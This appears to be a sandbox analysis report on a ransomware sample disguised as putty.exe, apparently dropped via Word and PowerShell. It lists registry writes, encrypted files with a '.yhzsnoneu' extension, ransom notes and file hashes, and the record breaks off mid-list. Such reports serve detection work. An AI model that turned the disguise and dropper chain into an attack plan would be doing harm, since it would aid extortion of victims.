94040000D161C933B3E19197BC25C0D3698B27EA22E1F07F92F8D9C4443315304A59421D4B00497C355CF4618C0D92C65E075ED01298A6952BBC64E6C4367073DED81229005E4C936C598923DDF63CF72F4C53F073036FDFCE63284FFAB0949C09CC9C1AD478504AE6D650B40A268745EBD97E2451E04DB96108885C397F871998465E1D9D4AB9A95A41F5ECACAFFAF07577584B7140BB68C70D4E64F9E689982AD3853BDDA23FF5B4195A321FA85D24BAB79314D4127330BAC16052A510B2255607EB9352C2A3EF598F749748F0D1DA6AD63ECBF8F8B7177336128529B14856E6AFA7070E9E55CFE5B97DB613C3225DE1337C183582F4BE23206D2E325B4E1BF0982F5DC81EA9053EB9A431617499F8C3DAA29050ACA535F40389786574DCB2BEBFF3070BFA5681F4C74414CDC3BFB5B595BE69F606921B1A66E4C9123845645E37F012C40251B7A14AB09F1C147BACE04A8E72BD694F2FAB12665597B77DE2AFCDBE59FC8BCA3E7BA53F9EAA95A410DAB9194B9A2DC0F582FC47C40BB30AA6A7996BB72EE5A9C94A27891DD453D376523EFB829E676860985D25666DCFF83133AF44F305E0956A8826630B791918939CCA00CAC3E4FECE88152F8BC6068A15D9B32C72984E067627CB4029A15A50D9C00DB3A81196149AFE95D1C15A8C20222127F79CE31C196993D27B43C156185CFC11D6DD45C8C44CAF3003BF7EC7F52023D7E6848D96BD22780B5E6E3D662A6FED6462212F2A0ADA3D3846B93440FF8412EEFD0A7DAFE80F8E89F0C460E802406CF17FC7A9A43196F83155BC005C4980B3E7A288D649805D953B9CDF41F2315C857A64E9089908FF1F8E45D8CF38330D65CA60EEA4005DD2686FFD587621662CE27B7A44E07AA31C6D5DE6E42D952E5875F821D12E2C71DC3B9694F01AD59D21BF82709E9D89E8CD2E20F84FC62C1137392ECA0452C8A6CBB56573656E6B9EA90B5DA2B155B49739C7EDA2C335CC0DD2D68E650A1E202080606878E44AC98C90DD6CB60EF901001351BD628305CF2A7DF5D67B7D53BE4A0F55D036EC9DAAEC7906809B6CA28BB7ED49C535C24CF61408E0F008D4C0FB7F2CE39726B1507F40B124D4F2710C492B057BD1568B977E04FA89EDF6B563B64916E9C75C7FB80628ECBD77609AADE0F3E310C0134F572377FD0F5634D41C41574227101EB8A375722E0AFF04149F2450018568AC382BFE80FDB18B1B6B185690B8771816A7973CE016A34CA8FC535D8AA35DD40E7E210224607831D700019ADCCCDF98C7EE3A0521BEE59DC043C27A695D95BAD972FF398A916DE97EA8BABC13A02D1C51DEB34369B866C5FF82D364C5E1638B8518E13C8C3E17D34B99624168F213D4A30256451A595865B9695616E2683E14A3F1847255C62943B9D4624FC7C2C97940C44FF6A003D0E2A1FF6B0271A6A8C26C309FBE5851D52FFEC179E9277F6FA1BD660CA63870AD99CC9905A1EA777ADD256EC773479EE3BA4B676DEEB8CAD01DFB777AAA155B195EAB6E97EB8C9339EB4B431854C4F7227C88AEFBAAB8411AF43005E7DD38E3BB4D4FBF3E9712E418D42FA497BEC9B8F298063490DFFCF562C12C77843B77B1AFA16321621BE88D22F7B3B48AE813263E0AA2C240175F9496A4D5CC117C51132DFF65436D66C346A29569623DB87436B628F942437E2D8677801F2421290C42DAADC675D899FF1106D900893C74C7A92D3EDDBDAAC51629EC7146B1BBA7AE4648118C4A79278AD676ACAFAB799FE358D6D9F067DF4B7744E23226E61CE9D3E8D52C50B79A5589DDDF8CE2CE33024ED26C439DB04736B18CBF873D9759FCD61DA9A1B562C1380FF7644CE912070D19474023DA67BA80FC4EC468E5B3E223CAF94028C78E5D213CF616E1FAB818C046EC228A6F5536F3BC95DBA9BB12CFC5474E3D6B5BCF256335D4FB5F4F8D5261ABD908B579B60DD7DB8009289AC4AB78671019B824EE19B342BA544386E0B6B2CC1108AF05A8DB69FEA13FF6EB0278E2C72E23021702578659D7626FEE4A8A9066F44C9CA6B8E8519EF485B3979C42688BB68438CD3022379BBD91B115C6B9E5755734BBDFD3AA0B13CCA3DE95B71ADC1D32E8ACC2D96FD7DA8926015D5661459885E8F09682589719BB4AF91A40DB497CFF3A4195BBB387417F4CA1BBAECB3341065FE2FA6279ED6DB119658E26CE0F89990C2801FDA88F81540533CEB8F5172978ADB56ED5C7829B5C969BB4BD0AE00D17C014666B739E5B5644D341DFE29C6BFF26EA80272070DD19F07C9F990FD4E821884E17D5ABDD99F3603977DB535788D84188720AA94FE01B4BFE91E92BEDF88C61F51A10053911EDD00A9A50D942113EBB85463A5C100A515EEB9264B7F2EF1CF154A4DC97BD6E88
3020
putty.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3020
putty.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
EnableFileTracing
0
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
EnableConsoleTracing
0
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
FileTracingMask
4294901760
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
ConsoleTracingMask
4294901760
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
MaxFileSize
1048576
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASAPI32
FileDirectory
%windir%\tracing
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
EnableFileTracing
0
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
EnableConsoleTracing
0
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
FileTracingMask
4294901760
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
ConsoleTracingMask
4294901760
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
MaxFileSize
1048576
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\putty_RASMANCS
FileDirectory
%windir%\tracing
3020
putty.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3020
putty.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000003000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3020
putty.exe
write
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
DefaultConnectionSettings
4600000002000000090000000000000000000000000000000400000000000000209837B359B9D401000000000000000000000000020000001700000000000000FE80000000000000A179B3FF019923140B000000A4462B02A4462B0200000002000000000400000000000000C8462B0204000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF0300000000000000020000000100000002000000C0A864A50000000000000000DADADADA00000000000000000500000000000000000000009E26250000000000000000000000000040472B0240472B020000000000000000FFFFFFFF0000000000000000000000000000000064472B0264472B020000000070472B0270472B0200000000000000000000000000000000
3020
putty.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
WpadLastNetwork
3020
putty.exe
write
HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510

Files activity

Executable files
1
Suspicious files
430
Text files
323
Unknown types
18

Dropped files

PID
Process
Filename
Type
2292
powershell.exe
C:\windows\temp\putty.exe
executable
MD5: ec01924f5299edb692b8707b5ca3632c
SHA256: c1a66da25419855f684261ac55f796127d84ca7bb9e089b1eb18afde66d1da7c
3008
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVR6A44.tmp.cvr
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Videos\Sample Videos\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.yhzsnoneu
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Recorded TV\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.yhzsnoneu
mp3
MD5: 20de19776bbd2b8ccaadfabe693f4853
SHA256: 2b9f66fc49d42cfb6d67dd3e9d261f14ed8c8aeb0288d6b8b80cea35065f4cab
3020
putty.exe
C:\Users\Public\Recorded TV\Sample Media\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.yhzsnoneu
binary
MD5: 2748c031af8e1fa43c48c69784ff8db2
SHA256: 596d4faa4647499eb02668e07f495456a243ea38ebd9bc48c19da96dc9888792
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.yhzsnoneu
binary
MD5: 6bf8253f6215ad3559c31791db2ab324
SHA256: d535fc6a7f2f87add16ac7ab44057f9db9ba05cfa626e5ba8818b3f5d2136f61
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.yhzsnoneu
binary
MD5: 934f2cb04a8662ca9e0db8903904a45b
SHA256: 12e66597069fed659a7bf850050184643bed39c8cea6462347fe8055c6a4b570
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.yhzsnoneu
binary
MD5: 47ac0da0d96035bad761e218a567b23a
SHA256: 17a9d5ecc909fe44a6bf110e1b2be8bc9c9452d48b6f82d74d2a174f5ad70396
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.yhzsnoneu
gpg
MD5: a4fb309eac4f3112877a7ab014bfe9ff
SHA256: 2015511ca40c29e337392fdde01017047ed0357517f5a1cdb97c98c591bb417f
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.yhzsnoneu
binary
MD5: 90149b6cfaf47252899e7dab462538b8
SHA256: 971a7826e4dabc1df028a4b6ac7695f24af6e48c5b82ac959a8e1ae778f96e04
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.yhzsnoneu
binary
MD5: b8cebc0ec707fa1722e9b2ec53a53804
SHA256: ca749857dd276e210e896c3d376fc8628d4f1ea49dde3d0a2a5a900d4c5cbf7c
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Pictures\Sample Pictures\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.yhzsnoneu
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.yhzsnoneu
binary
MD5: eb5109711b29e651eb7244d24da839d4
SHA256: f6e128efd336a271ba6a456d3ff9d2b2869363e9ec9e342e4696f9502874387e
3020
putty.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.yhzsnoneu
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.yhzsnoneu
binary
MD5: 26adc87da7e479b8d79dc1eff1305b4c
SHA256: 1b7dfe3a1691ca6227e5996ee6367cb380f4f532209e7a9976b69c7b7241278e
3020
putty.exe
C:\Users\Public\Music\Sample Music\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Public\Downloads\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Pictures\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Videos\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Libraries\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Favorites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Desktop\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Music\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\Documents\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Public\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Saved Games\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms.yhzsnoneu
binary
MD5: 6d82854a9ae08711bfc3ead814c9fa93
SHA256: af25755d88420b1ee7bbc63916857585d2847916360b3595d63e6cd89c20aba4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms.yhzsnoneu
binary
MD5: 12fb74481c944923ec07b19975a1c8a7
SHA256: e557d9a566c2020bcc6b64c7da1c671a4bbfaea4f3866c3b48fb1d90a7c955ee
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf.yhzsnoneu
binary
MD5: b3eb97039b7d6877694849ec75c6d5e0
SHA256: d3e4a0bb0cfcb50b60f958407efdebc164cf63ced761f96d5856b7c549e587c8
3020
putty.exe
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Default\NTUSER.DAT.LOG1.yhzsnoneu
binary
MD5: 90bee03ec44cc08e60c4511063f8a13b
SHA256: 0f679630386e21cf57fef5af32538cd0771e8ad540d8aa419b75cd33304e5f5c
3020
putty.exe
C:\Users\Default\NTUSER.DAT.LOG1
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\Default\Links\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Music\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Favorites\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Pictures\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Videos\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Downloads\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Desktop\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Local\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\History\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Media Center Programs\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Local\Microsoft\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\Documents\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Default\AppData\Local\Temp\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Searches\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\Saved Games\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\SendTo\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\ntuser.ini.yhzsnoneu
binary
MD5: 37e31d4cad45c76eec086ac2af0ee7ac
SHA256: a633dc5c0f04d951a777c1077d855e9579c88c71b3e4e4cf85473c2cdc1b568d
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\Administrator\ntuser.ini
––
MD5:  ––
SHA256:  ––
3020
putty.exe
